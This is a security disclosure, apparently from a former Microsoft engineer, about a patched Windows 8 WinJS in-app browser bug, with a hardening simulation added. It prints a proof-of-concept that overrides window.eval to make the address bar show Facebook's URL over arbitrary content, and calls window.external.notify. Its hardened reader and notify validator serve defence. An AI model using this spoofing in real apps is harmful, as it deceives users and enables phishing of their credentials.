In a Windows 8 WinJS app context, overriding the global eval method lets a hosted web page intercept calls the app framework makes internally — including the call used to retrieve document.location.href for display in the address bar. By returning a spoofed URL from the overridden eval, web content could make the in-app browser show https://www.facebook.com/ regardless of what page was actually loaded.

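// Keep a reference to the original eval so other calls still work.
window.pEval = window.eval;

// Replace the global eval: when the host evaluates a script that reads
// document.location.href, return a fixed URL instead of the real one.
window.eval = function(strCode) {
    if (strCode.indexOf("document.location.href") > -1) {
        return "https://www.facebook.com/";
    }
    return window.pEval(strCode);
};

// Send a '#title#' message to the native app layer.
function changeTitle() {
    window.external.notify('#title#' + "Title has been changed!");
}

// Send an '#opennewtab#' message that points at an app-package resource.
function openNewTab() {
    window.external.notify('#opennewtab#' + "ms-appx-web:///Images/Logo.png");
}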

The app’s native address bar UI read the current URL by evaluating a script via eval. Intercepting that call and returning a spoofed string caused the address bar to display Facebook’s URL while showing arbitrary content. The same mechanism exposed window.external.notify for sending messages to the native app layer. The QQ app was used as the test subject for this demonstration.
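
The host-side counterpart, as an added example that is not from the original write-up or from the QQ app: a simulation runnable in Node that contrasts an address bar that asks page script for its URL with one that uses the host's own navigation record, plus a handler that treats notify messages as untrusted input. The function names, the navEvent.uri field, the sample URLs used with it and the http/https-only tab policy are assumptions.

```javascript
"use strict";
// Added example (constructed simulation, not the app's code).

// Stand-in for the hosted page's script context after the page has
// replaced eval as in the snippet above. actualUrl is a constructed value.
function makeTamperedPage(actualUrl) {
  return {
    location: { href: actualUrl },
    eval: (code) =>
      code.indexOf("document.location.href") > -1
        ? "https://www.facebook.com/"
        : undefined,
  };
}

// Weak pattern: the host asks script running inside the page for the URL,
// so the answer is whatever the page chooses to return.
function addressBarFromPageScript(page) {
  return page.eval("document.location.href");
}

// Hardened pattern: the host displays the URL it navigated to, taken from
// its own navigation event (hypothetical navEvent.uri), never from the page.
function addressBarFromNavigation(navEvent) {
  return new URL(navEvent.uri).href;
}

// Assumed policy: web content may only ask for http(s) tabs.
const ALLOWED_TAB_SCHEMES = new Set(["http:", "https:"]);

// Treat every notify() string as untrusted input: accept only the two
// message types seen above, and validate the payload of each.
function handleNotify(message) {
  const m = /^#(title|opennewtab)#([\s\S]*)$/.exec(String(message));
  if (!m) return { action: "ignore" };
  if (m[1] === "title") {
    // Titles are display text only: strip control characters, cap length.
    const text = m[2].replace(/[\u0000-\u001f]/g, "").slice(0, 80);
    return { action: "setTitle", text };
  }
  let target;
  try { target = new URL(m[2]); } catch (e) { return { action: "ignore" }; }
  return ALLOWED_TAB_SCHEMES.has(target.protocol)
    ? { action: "openTab", url: target.href }
    : { action: "ignore" };
}
```

With the hardened reader, the overridden eval is never consulted, so the address bar keeps showing the URL the host actually loaded.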

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.